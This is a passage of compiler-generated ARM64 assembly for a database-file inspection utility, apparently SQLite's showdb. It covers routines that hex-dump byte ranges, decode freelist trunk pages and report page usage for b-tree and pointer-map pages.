subs x9, x9, #1
add x9, x8, x9
mov w8, #93
strb w8, [x9]
ldur w9, [x29, #-80]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
sub x0, x29, #38
str x0, [sp, #24] ; 8-byte Folded Spill
mov w1, #0
mov x2, #30
adrp x3, l_.str.99@PAGE
add x3, x3, l_.str.99@PAGEOFF
bl ___sprintf_chk
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _strlen
mov x8, x0
stur w8, [x29, #-84]
ldursw x8, [x29, #-84]
ldr x9, [sp, #72]
subs x9, x9, #2
subs x8, x8, x9
cset w8, gt
tbnz w8, #0, LBB7_38
b LBB7_37
LBB7_37: ; in Loop: Header=BB7_34 Depth=1
ldr x8, [sp, #96]
ldr w9, [sp, #92]
add w9, w9, #1
add x0, x8, w9, sxtw
ldursw x2, [x29, #-84]
sub x1, x29, #38
mov x3, #-1
bl ___memcpy_chk
b LBB7_38
LBB7_38: ; in Loop: Header=BB7_34 Depth=1
b LBB7_39
LBB7_39: ; in Loop: Header=BB7_34 Depth=1
ldur w8, [x29, #-100]
adds w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB7_41
b LBB7_40
LBB7_40: ; in Loop: Header=BB7_34 Depth=1
ldr w8, [sp, #92]
; implicit-def: $x11
mov x11, x8
ldur w8, [x29, #-80]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #80]
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.100@PAGE
add x0, x0, l_.str.100@PAGEOFF
bl _printf
b LBB7_45
LBB7_41: ; in Loop: Header=BB7_34 Depth=1
ldur w8, [x29, #-100]
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB7_43
b LBB7_42
LBB7_42: ; in Loop: Header=BB7_34 Depth=1
ldur w8, [x29, #-100]
ldur w9, [x29, #-80]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB7_44
b LBB7_43
LBB7_43: ; in Loop: Header=BB7_34 Depth=1
ldur x0, [x29, #-48]
ldur w1, [x29, #-52]
ldur w2, [x29, #-80]
ldur w3, [x29, #-56]
ldr w8, [sp, #92]
ldur w9, [x29, #-56]
subs w4, w8, w9
bl _decodeCell
b LBB7_44
LBB7_44: ; in Loop: Header=BB7_34 Depth=1
b LBB7_45
LBB7_45: ; in Loop: Header=BB7_34 Depth=1
b LBB7_46
LBB7_46: ; in Loop: Header=BB7_34 Depth=1
ldur w8, [x29, #-80]
add w8, w8, #1
stur w8, [x29, #-80]
b LBB7_34
LBB7_47:
ldur w8, [x29, #-96]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_53
b LBB7_48
LBB7_48:
adrp x0, l_.str.101@PAGE
add x0, x0, l_.str.101@PAGEOFF
bl _printf
stur wzr, [x29, #-80]
b LBB7_49
LBB7_49: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-80]
adrp x9, _pagesize@PAGE
ldr w9, [x9, _pagesize@PAGEOFF]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_52
b LBB7_50
LBB7_50: ; in Loop: Header=BB7_49 Depth=1
ldur w8, [x29, #-80]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #96]
ldursw x9, [x29, #-80]
add x8, x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.102@PAGE
add x0, x0, l_.str.102@PAGEOFF
bl _printf
b LBB7_51
LBB7_51: ; in Loop: Header=BB7_49 Depth=1
ldur w8, [x29, #-80]
add w8, w8, #64
stur w8, [x29, #-80]
b LBB7_49
LBB7_52:
ldr x0, [sp, #96]
bl _free
b LBB7_53
LBB7_53:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB7_55
b LBB7_54
LBB7_54:
bl ___stack_chk_fail
LBB7_55:
ldp x29, x30, [sp, #208] ; 16-byte Folded Reload
add sp, sp, #224
ret
.cfi_endproc
.p2align 2
lJTI7_0:
.long LBB7_2-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_3-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_4-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_6-Ltmp1
.long LBB7_5-Ltmp1
; -- End function
.p2align 2 ; -- Begin function decode_trunk_page
_decode_trunk_page: ; @decode_trunk_page
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur w0, [x29, #-24]
stur w1, [x29, #-28]
stur w2, [x29, #-32]
stur w3, [x29, #-36]
b LBB8_1
LBB8_1: ; =>This Loop Header: Depth=1
; Child Loop BB8_4 Depth 2
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB8_16
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #1
ldur w9, [x29, #-28]
mul w0, w8, w9
ldur w1, [x29, #-28]
bl _getContent
str x0, [sp, #40]
ldur w9, [x29, #-24]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.143@PAGE
add x0, x0, l_.str.143@PAGEOFF
bl _printf
ldr x0, [sp, #40]
mov w1, #0
mov w2, #4
str w2, [sp, #32] ; 4-byte Folded Spill
adrp x3, l_.str.144@PAGE
add x3, x3, l_.str.144@PAGEOFF
bl _print_decode_line
ldr w2, [sp, #32] ; 4-byte Folded Reload
ldr x0, [sp, #40]
mov x1, x2
adrp x3, l_.str.145@PAGE
add x3, x3, l_.str.145@PAGEOFF
bl _print_decode_line
ldur w8, [x29, #-32]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB8_12
b LBB8_3
LBB8_3: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #40]
add x0, x8, #4
bl _decodeInt32
stur w0, [x29, #-40]
stur wzr, [x29, #-44]
b LBB8_4
LBB8_4: ; Parent Loop BB8_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-44]
ldur w9, [x29, #-40]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_9
b LBB8_5
LBB8_5: ; in Loop: Header=BB8_4 Depth=2
ldr x8, [sp, #40]
ldur w10, [x29, #-44]
mov w9, #4
mul w9, w9, w10
add w9, w9, #8
add x0, x8, w9, sxtw
bl _decodeInt32
str w0, [sp, #36]
ldur w9, [x29, #-44]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
sub x0, x29, #18
str x0, [sp, #24] ; 8-byte Folded Spill
mov w1, #0
mov x2, #10
adrp x3, l_.str.146@PAGE
add x3, x3, l_.str.146@PAGEOFF
bl ___sprintf_chk
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.147@PAGE
add x0, x0, l_.str.147@PAGEOFF
bl _printf
ldur w8, [x29, #-44]
mov w10, #5
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB8_7
b LBB8_6
LBB8_6: ; in Loop: Header=BB8_4 Depth=2
adrp x0, l_.str.22@PAGE
add x0, x0, l_.str.22@PAGEOFF
bl _printf
b LBB8_7
LBB8_7: ; in Loop: Header=BB8_4 Depth=2
b LBB8_8
LBB8_8: ; in Loop: Header=BB8_4 Depth=2
ldur w8, [x29, #-44]
add w8, w8, #1
stur w8, [x29, #-44]
b LBB8_4
LBB8_9: ; in Loop: Header=BB8_1 Depth=1
ldur w8, [x29, #-44]
mov w10, #5
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB8_11
b LBB8_10
LBB8_10: ; in Loop: Header=BB8_1 Depth=1
adrp x0, l_.str.22@PAGE
add x0, x0, l_.str.22@PAGEOFF
bl _printf
b LBB8_11
LBB8_11: ; in Loop: Header=BB8_1 Depth=1
b LBB8_12
LBB8_12: ; in Loop: Header=BB8_1 Depth=1
ldur w8, [x29, #-36]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB8_14
b LBB8_13
LBB8_13: ; in Loop: Header=BB8_1 Depth=1
stur wzr, [x29, #-24]
b LBB8_15
LBB8_14: ; in Loop: Header=BB8_1 Depth=1
ldr x0, [sp, #40]
bl _decodeInt32
stur w0, [x29, #-24]
b LBB8_15
LBB8_15: ; in Loop: Header=BB8_1 Depth=1
ldr x0, [sp, #40]
bl _free
b LBB8_1
LBB8_16:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB8_18
b LBB8_17
LBB8_17:
bl ___stack_chk_fail
LBB8_18:
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function print_byte_range
_print_byte_range: ; @print_byte_range
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stdoutp@GOTPAGE
ldr x8, [x8, ___stdoutp@GOTPAGEOFF]
str x8, [sp, #32] ; 8-byte Folded Spill
stur w0, [x29, #-4]
stur w1, [x29, #-8]
stur w2, [x29, #-12]
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
add w8, w8, w9
mov w9, #-4096
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB9_2
b LBB9_1
LBB9_1:
adrp x8, l_.str.13@PAGE
add x8, x8, l_.str.13@PAGEOFF
str x8, [sp, #40]
b LBB9_12
LBB9_2:
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
add w8, w8, w9
mov w9, #-65536
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB9_4
b LBB9_3
LBB9_3:
adrp x8, l_.str.14@PAGE
add x8, x8, l_.str.14@PAGEOFF
str x8, [sp, #40]
b LBB9_11
LBB9_4:
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
add w8, w8, w9
mov w9, #-1048576
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB9_6
b LBB9_5
LBB9_5:
adrp x8, l_.str.15@PAGE
add x8, x8, l_.str.15@PAGEOFF
str x8, [sp, #40]
b LBB9_10
LBB9_6:
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
add w8, w8, w9
mov w9, #-16777216
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB9_8
b LBB9_7
LBB9_7:
adrp x8, l_.str.16@PAGE
add x8, x8, l_.str.16@PAGEOFF
str x8, [sp, #40]
b LBB9_9
LBB9_8:
adrp x8, l_.str.17@PAGE
add x8, x8, l_.str.17@PAGEOFF
str x8, [sp, #40]
b LBB9_9
LBB9_9:
b LBB9_10
LBB9_10:
b LBB9_11
LBB9_11:
b LBB9_12
LBB9_12:
ldur w0, [x29, #-4]
ldur w1, [x29, #-8]
bl _getContent
stur x0, [x29, #-24]
stur wzr, [x29, #-28]
b LBB9_13
LBB9_13: ; =>This Loop Header: Depth=1
; Child Loop BB9_15 Depth 2
; Child Loop BB9_22 Depth 2
ldur w8, [x29, #-28]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_33
b LBB9_14
LBB9_14: ; in Loop: Header=BB9_13 Depth=1
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
ldr x1, [sp, #40]
ldur w8, [x29, #-28]
ldur w9, [x29, #-12]
add w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
bl _fprintf
stur wzr, [x29, #-32]
b LBB9_15
LBB9_15: ; Parent Loop BB9_13 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-32]
adrp x9, _perLine@PAGE
ldr w9, [x9, _perLine@PAGEOFF]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_21
b LBB9_16
LBB9_16: ; in Loop: Header=BB9_15 Depth=2
ldur w8, [x29, #-28]
ldur w9, [x29, #-32]
add w8, w8, w9
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB9_18
b LBB9_17
LBB9_17: ; in Loop: Header=BB9_15 Depth=2
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.18@PAGE
add x1, x1, l_.str.18@PAGEOFF
bl _fprintf
b LBB9_19
LBB9_18: ; in Loop: Header=BB9_15 Depth=2
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
ldur x8, [x29, #-24]
ldur w9, [x29, #-28]
ldur w10, [x29, #-32]
add w9, w9, w10
ldrb w10, [x8, w9, sxtw]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x1, l_.str.19@PAGE
add x1, x1, l_.str.19@PAGEOFF
bl _fprintf
b LBB9_19
LBB9_19: ; in Loop: Header=BB9_15 Depth=2
b LBB9_20
LBB9_20: ; in Loop: Header=BB9_15 Depth=2
ldur w8, [x29, #-32]
add w8, w8, #1
stur w8, [x29, #-32]
b LBB9_15
LBB9_21: ; in Loop: Header=BB9_13 Depth=1
stur wzr, [x29, #-32]
b LBB9_22
LBB9_22: ; Parent Loop BB9_13 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-32]
adrp x9, _perLine@PAGE
ldr w9, [x9, _perLine@PAGEOFF]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_31
b LBB9_23
LBB9_23: ; in Loop: Header=BB9_22 Depth=2
ldur w8, [x29, #-28]
ldur w9, [x29, #-32]
add w8, w8, w9
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB9_25
b LBB9_24
LBB9_24: ; in Loop: Header=BB9_22 Depth=2
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.20@PAGE
add x1, x1, l_.str.20@PAGEOFF
bl _fprintf
b LBB9_29
LBB9_25: ; in Loop: Header=BB9_22 Depth=2
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x8, [x8]
str x8, [sp, #24] ; 8-byte Folded Spill
ldur x8, [x29, #-24]
ldur w9, [x29, #-28]
ldur w10, [x29, #-32]
add w9, w9, w10
ldrb w0, [x8, w9, sxtw]
bl _isprint
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB9_27
b LBB9_26
LBB9_26: ; in Loop: Header=BB9_22 Depth=2
ldur x8, [x29, #-24]
ldur w9, [x29, #-28]
ldur w10, [x29, #-32]
add w9, w9, w10
ldrb w8, [x8, w9, sxtw]
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB9_28
LBB9_27: ; in Loop: Header=BB9_22 Depth=2
mov w8, #46
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB9_28
LBB9_28: ; in Loop: Header=BB9_22 Depth=2
ldr x0, [sp, #24] ; 8-byte Folded Reload
ldr w10, [sp, #20] ; 4-byte Folded Reload
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x1, l_.str.21@PAGE
add x1, x1, l_.str.21@PAGEOFF
bl _fprintf
b LBB9_29
LBB9_29: ; in Loop: Header=BB9_22 Depth=2
b LBB9_30
LBB9_30: ; in Loop: Header=BB9_22 Depth=2
ldur w8, [x29, #-32]
add w8, w8, #1
stur w8, [x29, #-32]
b LBB9_22
LBB9_31: ; in Loop: Header=BB9_13 Depth=1
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.22@PAGE
add x1, x1, l_.str.22@PAGEOFF
bl _fprintf
b LBB9_32
LBB9_32: ; in Loop: Header=BB9_13 Depth=1
adrp x8, _perLine@PAGE
ldr w9, [x8, _perLine@PAGEOFF]
ldur w8, [x29, #-28]
add w8, w8, w9
stur w8, [x29, #-28]
b LBB9_13
LBB9_33:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function print_decode_line
_print_decode_line: ; @print_decode_line
.cfi_startproc
; %bb.0:
sub sp, sp, #208
.cfi_def_cfa_offset 208
stp x29, x30, [sp, #192] ; 16-byte Folded Spill
add x29, sp, #192
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #72]
str w1, [sp, #68]
str w2, [sp, #64]
str x3, [sp, #56]
ldr x8, [sp, #72]
ldrsw x9, [sp, #68]
ldrb w8, [x8, x9]
str w8, [sp, #44]
ldr w9, [sp, #68]
; implicit-def: $x8
mov x8, x9
ldr x9, [sp, #72]
ldrsw x10, [sp, #68]
ldrb w10, [x9, x10]
mov x9, sp
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
add x0, sp, #84
str x0, [sp, #32] ; 8-byte Folded Spill
mov w1, #0
mov x2, #100
adrp x3, l_.str.47@PAGE
add x3, x3, l_.str.47@PAGEOFF
bl ___sprintf_chk
ldr x0, [sp, #32] ; 8-byte Folded Reload
bl _strlen
mov x8, x0
str w8, [sp, #52]
mov w8, #1
str w8, [sp, #48]
b LBB10_1
LBB10_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #48]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB10_7
b LBB10_2
LBB10_2: ; in Loop: Header=BB10_1 Depth=1
ldr w8, [sp, #48]
ldr w9, [sp, #64]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB10_4
b LBB10_3
LBB10_3: ; in Loop: Header=BB10_1 Depth=1
ldrsw x9, [sp, #52]
add x8, sp, #84
add x0, x8, x9
mov w1, #0
mov x2, #-1
adrp x3, l_.str.18@PAGE
add x3, x3, l_.str.18@PAGEOFF
bl ___sprintf_chk
b LBB10_5
LBB10_4: ; in Loop: Header=BB10_1 Depth=1
ldrsw x9, [sp, #52]
add x8, sp, #84
add x0, x8, x9
ldr x8, [sp, #72]
ldr w9, [sp, #68]
ldr w10, [sp, #48]
add w9, w9, w10
ldrb w10, [x8, w9, sxtw]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.48@PAGE
add x3, x3, l_.str.48@PAGEOFF
bl ___sprintf_chk
ldr w9, [sp, #44]
ldr x8, [sp, #72]
ldr w10, [sp, #68]
ldr w11, [sp, #48]
add w10, w10, w11
ldrb w8, [x8, w10, sxtw]
add w8, w8, w9, lsl #8
str w8, [sp, #44]
b LBB10_5
LBB10_5: ; in Loop: Header=BB10_1 Depth=1
ldrsw x9, [sp, #52]
add x8, sp, #84
add x0, x8, x9
bl _strlen
mov x9, x0
ldr w8, [sp, #52]
add w8, w8, w9
str w8, [sp, #52]
b LBB10_6
LBB10_6: ; in Loop: Header=BB10_1 Depth=1
ldr w8, [sp, #48]
add w8, w8, #1
str w8, [sp, #48]
b LBB10_1
LBB10_7:
ldrsw x9, [sp, #52]
add x8, sp, #84
str x8, [sp, #24] ; 8-byte Folded Spill
add x0, x8, x9
ldr w9, [sp, #44]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
mov w1, #0
mov x2, #-1
adrp x3, l_.str.49@PAGE
add x3, x3, l_.str.49@PAGEOFF
bl ___sprintf_chk
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #56]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.50@PAGE
add x0, x0, l_.str.50@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB10_9
b LBB10_8
LBB10_8:
bl ___stack_chk_fail
LBB10_9:
ldp x29, x30, [sp, #192] ; 16-byte Folded Reload
add sp, sp, #208
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function out_of_memory
_out_of_memory: ; @out_of_memory
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.61@PAGE
add x1, x1, l_.str.61@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function page_usage_freelist
_page_usage_freelist: ; @page_usage_freelist
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur wzr, [x29, #-20]
mov w8, #1
str w8, [sp, #28]
b LBB12_1
LBB12_1: ; =>This Loop Header: Depth=1
; Child Loop BB12_6 Depth 2
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, le
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB12_4
b LBB12_2
LBB12_2: ; in Loop: Header=BB12_1 Depth=1
ldur w8, [x29, #-4]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB12_4
b LBB12_3
LBB12_3: ; in Loop: Header=BB12_1 Depth=1
ldur w8, [x29, #-20]
add w9, w8, #1
stur w9, [x29, #-20]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, lt
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB12_4
LBB12_4: ; in Loop: Header=BB12_1 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
tbz w8, #0, LBB12_10
b LBB12_5
LBB12_5: ; in Loop: Header=BB12_1 Depth=1
ldur w0, [x29, #-4]
ldur w8, [x29, #-20]
; implicit-def: $x10
mov x10, x8
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.62@PAGE
add x1, x1, l_.str.62@PAGEOFF
bl _page_usage_msg
ldur w8, [x29, #-4]
subs w9, w8, #1
adrp x8, _pagesize@PAGE
ldr w10, [x8, _pagesize@PAGEOFF]
mul w0, w9, w10
ldr w1, [x8, _pagesize@PAGEOFF]
bl _getContent
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _decodeInt32
str w0, [sp, #32]
ldur x8, [x29, #-16]
add x0, x8, #4
bl _decodeInt32
stur w0, [x29, #-28]
stur wzr, [x29, #-24]
b LBB12_6
LBB12_6: ; Parent Loop BB12_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-24]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB12_9
b LBB12_7
LBB12_7: ; in Loop: Header=BB12_6 Depth=2
ldur x8, [x29, #-16]
ldur w9, [x29, #-24]
lsl w9, w9, #2
add w9, w9, #8
add x0, x8, w9, sxtw
bl _decodeInt32
str w0, [sp, #24]
ldr w0, [sp, #24]
ldur w8, [x29, #-24]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-4]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.63@PAGE
add x1, x1, l_.str.63@PAGEOFF
bl _page_usage_msg
b LBB12_8
LBB12_8: ; in Loop: Header=BB12_6 Depth=2
ldur w8, [x29, #-24]
add w8, w8, #1
stur w8, [x29, #-24]
b LBB12_6
LBB12_9: ; in Loop: Header=BB12_1 Depth=1
ldur x0, [x29, #-16]
bl _free
ldur w8, [x29, #-4]
str w8, [sp, #28]
ldr w8, [sp, #32]
stur w8, [x29, #-4]
b LBB12_1
LBB12_10:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function decodeInt32
_decodeInt32: ; @decodeInt32
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
ldrb w9, [x8]
ldr x8, [sp, #8]
ldrb w8, [x8, #1]
lsl w8, w8, #16
add w8, w8, w9, lsl #24
ldr x9, [sp, #8]
ldrb w9, [x9, #2]
add w8, w8, w9, lsl #8
ldr x9, [sp, #8]
ldrb w9, [x9, #3]
add w0, w8, w9
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function page_usage_ptrmap
_page_usage_ptrmap: ; @page_usage_ptrmap
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldrb w8, [x8, #55]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB14_5
b LBB14_1
LBB14_1:
adrp x8, _pagesize@PAGE
ldr w8, [x8, _pagesize@PAGEOFF]
ldur x9, [x29, #-8]
ldrb w9, [x9, #20]
subs w8, w8, w9
stur w8, [x29, #-12]
mov w8, #2
stur w8, [x29, #-16]
ldur w8, [x29, #-12]
mov w9, #5
sdiv w8, w8, w9
stur w8, [x29, #-20]
b LBB14_2
LBB14_2: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-16]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB14_4
b LBB14_3
LBB14_3: ; in Loop: Header=BB14_2 Depth=1
ldur w0, [x29, #-16]
ldur w8, [x29, #-16]
add w11, w8, #1
ldur w8, [x29, #-16]
ldur w9, [x29, #-20]
add w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x11
str x8, [x9]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #8]
adrp x1, l_.str.68@PAGE
add x1, x1, l_.str.68@PAGEOFF
bl _page_usage_msg
ldur w8, [x29, #-20]
add w9, w8, #1
ldur w8, [x29, #-16]
add w8, w8, w9
stur w8, [x29, #-16]
b LBB14_2
LBB14_4:
b LBB14_5
LBB14_5:
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function page_usage_btree
_page_usage_btree: ; @page_usage_btree
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
stur w2, [x29, #-12]
stur x3, [x29, #-24]
adrp x8, l_.str.69@PAGE
add x8, x8, l_.str.69@PAGEOFF
stur x8, [x29, #-40]
ldur w8, [x29, #-4]
subs w8, w8, #1
cset w8, eq
and w10, w8, #0x1
mov w9, #0
mov w8, #100
ands w10, w10, #0x1
csel w8, w8, w9, ne
stur w8, [x29, #-52]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB15_2
b LBB15_1
LBB15_1:
ldur w8, [x29, #-4]
adrp x9, _mxPage@PAGE
ldr w9, [x9, _mxPage@PAGEOFF]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB15_3
b LBB15_2
LBB15_2:
b LBB15_28
LBB15_3:
ldur w8, [x29, #-4]
subs w9, w8, #1
adrp x8, _pagesize@PAGE
ldr w10, [x8, _pagesize@PAGEOFF]
mul w0, w9, w10
ldr w1, [x8, _pagesize@PAGEOFF]
bl _getContent
stur x0, [x29, #-32]
ldur x8, [x29, #-32]
ldursw x9, [x29, #-52]
ldrb w8, [x8, x9]
subs w8, w8, #2
; kill: def $x8 killed $w8
str x8, [sp, #32] ; 8-byte Folded Spill
subs x8, x8, #11
cset w8, hi
tbnz w8, #0, LBB15_9
; %bb.4:
ldr x11, [sp, #32] ; 8-byte Folded Reload
adrp x10, lJTI15_0@PAGE
add x10, x10, lJTI15_0@PAGEOFF
Ltmp3:
adr x8, Ltmp3
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB15_5:
